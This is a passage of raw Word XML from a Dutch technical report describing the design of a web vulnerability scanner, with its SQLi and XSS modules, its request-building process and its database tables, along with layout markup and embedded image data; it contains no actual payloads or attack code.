41Sd1qMjp6EarAuspp6s1oQLm+UMGjIg8zWndUcAi&#10;zdfAq5L/31D9AAAA//8DAFBLAQItABQABgAIAAAAIQDkmcPA+wAAAOEBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhACOyauHXAAAAlAEAAAsAAAAA&#10;AAAAAAAAAAAALAEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAIWQefk6AgAAegQAAA4AAAAA&#10;AAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAP0hQrniAAAACwEAAA8A&#10;AAAAAAAAAAAAAAAAkgQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAChBQAAAAA=&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="27FAC3D7" w14:textId="0F27367D" w:rsidR="00CE4BB5" w:rsidRPr="00AD73EE" w:rsidRDefault="00CE4BB5" w:rsidP="00476E5A">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 4.13</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD2061C" w14:textId="77777777" w:rsidR="009A5206" w:rsidRPr="0036287C" w:rsidRDefault="009A5206" w:rsidP="009A5206">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2D49">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674159A1" w14:textId="77777777" w:rsidR="009A5206" w:rsidRDefault="009A5206" w:rsidP="009A5206">
      <w:r>
        <w:t xml:space="preserve">Beide modules hebben een soortgelijke werking ze gebruiken beide URL’s met query’s en payloads waarmee aanvallen worden verricht, en het identificatieproces van kwetsbaarheden is ook soortgelijk. De URL en query’s vormen het eerste deel van de HTTP GET Request deze staan opgeslagen in de database waar de Scanner via de service laag (H 4.1) toegang tot krijgt. Het tweede deel van de GET Request zijn de payloads. De payload is een tekstbestand dat ingeladen wordt in een scanmodule. Payloads verschillen per scanmodule, de scanmodule </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> heeft </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>SQL query’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> als payload en de XSS module javascript code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8EAEBB" w14:textId="77777777" w:rsidR="009A5206" w:rsidRDefault="009A5206">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51186043" w14:textId="77777777" w:rsidR="009A5206" w:rsidRDefault="009A5206">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F31BDF6" w14:textId="77777777" w:rsidR="009A5206" w:rsidRDefault="009A5206">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2251551E" w14:textId="77777777" w:rsidR="009A5206" w:rsidRDefault="009A5206">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="253B3611" w14:textId="77777777" w:rsidR="009A5206" w:rsidRDefault="009A5206">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0738FC5D" w14:textId="77777777" w:rsidR="00531A8C" w:rsidRDefault="009F05C3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Scanner proces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC8525E" w14:textId="77777777" w:rsidR="00573394" w:rsidRDefault="00C61A47">
      <w:r>
        <w:t xml:space="preserve">Het Scanner component voert de gesimuleerde aanvallen </w:t>
      </w:r>
      <w:r w:rsidR="00573394">
        <w:t>in drie processen uit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2EFEDD" w14:textId="77777777" w:rsidR="00E57A27" w:rsidRDefault="004F328D" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Combineerproces – het </w:t>
      </w:r>
      <w:r w:rsidR="0088007D">
        <w:t>proces dat</w:t>
      </w:r>
      <w:r w:rsidR="00E57A27">
        <w:t xml:space="preserve"> van</w:t>
      </w:r>
      <w:r w:rsidR="0088007D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A53110">
        <w:t xml:space="preserve">de URL, </w:t>
      </w:r>
      <w:r w:rsidR="008F4BD7">
        <w:t xml:space="preserve">Query en </w:t>
      </w:r>
      <w:r w:rsidR="00E57A27">
        <w:t>payload één geheel maakt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A20D449" w14:textId="77777777" w:rsidR="00E57A27" w:rsidRDefault="00E57A27" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>e.g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId58" w:history="1">
        <w:r w:rsidRPr="002A442A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>www.webshop.nl?query=payload</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2BCFE401" w14:textId="6D1CFE57" w:rsidR="00C515A4" w:rsidRDefault="00E57A27" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aanval proces </w:t>
      </w:r>
      <w:r w:rsidR="00321093">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00321093">
        <w:t xml:space="preserve">Het </w:t>
      </w:r>
      <w:r w:rsidR="00C515A4">
        <w:t>proces waarin de samengestelde URL’s worden gebruikt voor het simuleren van een HTTP GET aanval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477D3288" w14:textId="747E269F" w:rsidR="009F05C3" w:rsidRPr="00E57A27" w:rsidRDefault="00C515A4" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Analyse proces – het proces waarin het resultaat van de HTTP Get aanval wordt </w:t>
      </w:r>
      <w:r w:rsidR="003F7CA9">
        <w:t>analyseert voor het identificeren van kwetsbaarheden.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEEB997" w14:textId="0A45D4C7" w:rsidR="006A4FF3" w:rsidRDefault="005E14FF" w:rsidP="00251301">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251981824" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="156376ED" wp14:editId="7BB72337">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1008380</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>234950</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3112135" cy="1026795"/>
            <wp:effectExtent l="0" t="0" r="12065"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URI aanval.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId59">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3112135" cy="1026795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="013B74BA" w14:textId="5559CF44" w:rsidR="005E14FF" w:rsidRDefault="005E14FF" w:rsidP="00251301">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251983872" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="090E5132" wp14:editId="40D3EEE4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>999490</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1071245</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3429635" cy="231140"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="18989"/>
                    <wp:lineTo x="21436" y="18989"/>
                    <wp:lineTo x="21436" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="228" name="Text Box 228"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3429635" cy="231140"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="528A9730" w14:textId="193E9002" w:rsidR="00CE4BB5" w:rsidRPr="002E3CFB" w:rsidRDefault="00CE4BB5" w:rsidP="00084014">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figure 4.14 sql module voorbeeld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E5132" id="Text Box 228" o:spid="_x0000_s1095" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:78.7pt;margin-top:84.35pt;width:270.05pt;height:18.2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9uT9zsCAAB6BAAADgAAAGRycy9lMm9Eb2MueG1srFTfb9owEH6ftP/B8vsIhA6tiFAxKqZJVVsJ&#10;pj4bxyaWbJ9nGxL21+/sELp1e5r24pzvzvfj++6yuOuMJifhgwJb0cloTImwHGplDxX9ttt8+ERJ&#10;iMzWTIMVFT2LQO+W798tWjcXJTSga+EJBrFh3rqKNjG6eVEE3gjDwgicsGiU4A2LePWHovasxehG&#10;F+V4PCta8LXzwEUIqL3vjXSZ40speHySMohIdEWxtphPn899Oovlgs0PnrlG8UsZ7B+qMExZTHoN&#10;dc8iI0ev/ghlFPcQQMYRB1OAlIqL3AN2Mxm/6WbbMCdyLwhOcFeYwv8Lyx9Pz56ouqJliVRZZpCk&#10;negi+QwdSTpEqHVhjo5bh66xQwMyPegDKlPjnfQmfbElgnbE+nzFN4XjqJzelLez6UdKONrK6WRy&#10;kwkoXl87H+IXAYYkoaIe+cuwstNDiFgJug4uKVkAreqN0jpdkmGtPTkx5LptVBSpRnzxm5e2yddC&#10;etWbe43Iw3LJkhruG0tS7PZdhmhWDl3voT4jGB76gQqObxSmf2AhPjOPE4T941bEJzykhraicJEo&#10;acD/+Js++SOxaKWkxYmsaPh+ZF5Qor9apDyN7yD4QdgPgj2aNWDjE9w3x7OID3zUgyg9mBdcllXK&#10;giZmOeaqaBzEdez3ApeNi9UqO+GQOhYf7NbxFHqAede9MO8uJEWk9xGGWWXzN1z1vj3oq2MEqTKR&#10;CdgeReQoXXDAM1uXZUwb9Os9e73+MpY/AQAA//8DAFBLAwQUAAYACAAAACEA6V1N9OAAAAALAQAA&#10;DwAAAGRycy9kb3ducmV2LnhtbEyPwU6DQBCG7ya+w2ZMvBi7lAhUZGm01ZseWpuet+wIRHaWsEuh&#10;b+940tv8mS//fFOsZ9uJMw6+daRguYhAIFXOtFQrOHy+3a9A+KDJ6M4RKrigh3V5fVXo3LiJdnje&#10;h1pwCflcK2hC6HMpfdWg1X7heiTefbnB6sBxqKUZ9MTltpNxFKXS6pb4QqN73DRYfe9HqyDdDuO0&#10;o83d9vD6rj/6Oj6+XI5K3d7Mz08gAs7hD4ZffVaHkp1ObiTjRcc5yR4Y5SFdZSCYSB+zBMRJQRwl&#10;S5BlIf//UP4AAAD//wMAUEsBAi0AFAAGAAgAAAAhAOSZw8D7AAAA4QEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAI7Jq4dcAAACUAQAACwAAAAAA&#10;AAAAAAAAAAAsAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAj9uT9zsCAAB6BAAADgAAAAAA&#10;AAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA6V1N9OAAAAALAQAADwAA&#10;AAAAAAAAAAAAAACTBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAKAFAAAAAA==&#10;" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="528A9730" w14:textId="193E9002" w:rsidR="00CE4BB5" w:rsidRPr="002E3CFB" w:rsidRDefault="00CE4BB5" w:rsidP="00084014">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 4.14 sql module voorbeeld</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F9BD1D" w14:textId="64B3809C" w:rsidR="005E14FF" w:rsidRDefault="005E14FF" w:rsidP="00251301">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09EF8091" w14:textId="600B623E" w:rsidR="005F1B43" w:rsidRPr="00335B13" w:rsidRDefault="00335B13" w:rsidP="00251301">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A14F74">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Combineerproces</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> – stap 1</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2292"/>
        <w:gridCol w:w="4646"/>
      </w:tblGrid>
      <w:tr w:rsidR="007D2CE1" w14:paraId="0A77A9B4" w14:textId="77777777" w:rsidTr="0079775E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2292" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69EE1B89" w14:textId="2720FE74" w:rsidR="007D2CE1" w:rsidRDefault="007D2CE1" w:rsidP="00251301">
            <w:r>
              <w:t>Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4646" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EA3516D" w14:textId="37CE6236" w:rsidR="007D2CE1" w:rsidRDefault="007D2CE1" w:rsidP="00251301">
            <w:r>
              <w:t>Omschrijving</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D2CE1" w14:paraId="74CE3DAD" w14:textId="77777777" w:rsidTr="0079775E">
        <w:trPr>
          <w:trHeight w:val="208"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2292" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BB60F78" w14:textId="0B2C5762" w:rsidR="007D2CE1" w:rsidRDefault="00621F60" w:rsidP="00251301">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4646" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="027C4776" w14:textId="1BDDA688" w:rsidR="007D2CE1" w:rsidRDefault="0079775E" w:rsidP="00251301">
            <w:r>
              <w:t xml:space="preserve">De </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Unified</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Resource </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Locator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, het adres waar de aanval op wordt uitgevoerd.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D2CE1" w14:paraId="19A26845" w14:textId="77777777" w:rsidTr="0079775E">
        <w:trPr>
          <w:trHeight w:val="208"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2292" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10B3B52A" w14:textId="0686E49B" w:rsidR="007D2CE1" w:rsidRDefault="007D2CE1" w:rsidP="00251301">
            <w:r>
              <w:t>Parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4646" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5939CE0B" w14:textId="1EAB5CCC" w:rsidR="007D2CE1" w:rsidRDefault="00E07FD4" w:rsidP="00251301">
            <w:r>
              <w:t>De parameters die gekoppeld worden aan de URL’s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="061225A9" w14:textId="48AE7A82" w:rsidR="005E14FF" w:rsidRDefault="00DB42EB" w:rsidP="00251301">
      <w:r>
        <w:t xml:space="preserve">Tabel </w:t>
      </w:r>
      <w:r w:rsidR="00F84913">
        <w:t>4.12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627EFFDB" w14:textId="77777777" w:rsidR="005E14FF" w:rsidRDefault="005E14FF" w:rsidP="00251301"/>
    <w:p w14:paraId="223EE1DC" w14:textId="46451581" w:rsidR="00EB4D92" w:rsidRDefault="00051F96" w:rsidP="00251301">
      <w:r>
        <w:t xml:space="preserve">De Scanner gebruikt eigenlijk maar twee waardes voor een scan de Hyperlinks die geïndexeerd zijn door de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en de parameters die gekoppeld worden met de Hyperlinks in de database, de verbintenis noemt men een</w:t>
      </w:r>
      <w:r w:rsidR="00677A9B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00677A9B">
        <w:t>Foreign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00677A9B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00677A9B">
        <w:t>Key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> relatie</w:t>
      </w:r>
      <w:r w:rsidR="00677A9B">
        <w:t xml:space="preserve"> (FK)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FD4C64">
        <w:t xml:space="preserve"> Bij zo’n relatie </w:t>
      </w:r>
      <w:r w:rsidR="00501BED">
        <w:t xml:space="preserve">wordt de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00501BED">
        <w:t>Primairy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00501BED">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00501BED">
        <w:t>Key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00501BED">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00860395">
        <w:t>identificatienummer</w:t>
      </w:r>
      <w:r w:rsidR="00501BED">
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00501BED" w:rsidRPr="006131F3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00501BED">
        <w:t>” uit Tabel link, gekoppeld met de “</w:t>
      </w:r>
      <w:r w:rsidR="006131F3" w:rsidRPr="006131F3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">link </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006131F3" w:rsidRPr="006131F3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00501BED">
        <w:t xml:space="preserve">” in tabel parameter, dat </w:t>
      </w:r>
      <w:r w:rsidR="00860395">
        <w:t>dezelfde</w:t>
      </w:r>
      <w:r w:rsidR="00501BED">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00860395">
        <w:t>identificatienummer</w:t>
      </w:r>
      <w:r w:rsidR="00FF7AC2">
        <w:t xml:space="preserve"> representeert als in de Tabel link. </w:t>
      </w:r>
      <w:r w:rsidR="00057193">
        <w:t xml:space="preserve">Zo weet het </w:t>
      </w:r>
      <w:r w:rsidR="004D2CEA">
        <w:t>softwaresysteem</w:t>
      </w:r>
      <w:r w:rsidR="00057193">
        <w:t xml:space="preserve"> welke parameters </w:t>
      </w:r>
      <w:r w:rsidR="00F2471E">
        <w:t xml:space="preserve">bij welke </w:t>
      </w:r>
      <w:r w:rsidR="009F08DF">
        <w:t>link hoort.</w:t>
      </w:r>
      <w:r w:rsidR="009A6ACE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C69309" w14:textId="4A08D16B" w:rsidR="002C1E9F" w:rsidRDefault="002C1E9F" w:rsidP="00251301"/>
    <w:p w14:paraId="6274FCB6" w14:textId="4F56C31F" w:rsidR="00251301" w:rsidRPr="00251301" w:rsidRDefault="005E14FF" w:rsidP="00251301">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251972608" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1A2BB1A1" wp14:editId="563707B8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>817245</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>26035</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3670935" cy="1049655"/>
            <wp:effectExtent l="0" t="0" r="12065" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>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links en parameters.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId60">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3670935" cy="1049655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F2211C" w14:textId="2C9EC922" w:rsidR="005352A7" w:rsidRDefault="005352A7" w:rsidP="008571B9"/>
    <w:p w14:paraId="693DEB4C" w14:textId="6938A7EA" w:rsidR="002F4C44" w:rsidRDefault="002F4C44" w:rsidP="008571B9"/>
    <w:p w14:paraId="0778BF98" w14:textId="04989098" w:rsidR="002F4C44" w:rsidRDefault="005E14FF" w:rsidP="008571B9">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251974656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="303117BC" wp14:editId="7841CBA8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>873760</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>254635</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3670935" cy="269875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="223" name="Text Box 223"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3670935" cy="269875"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
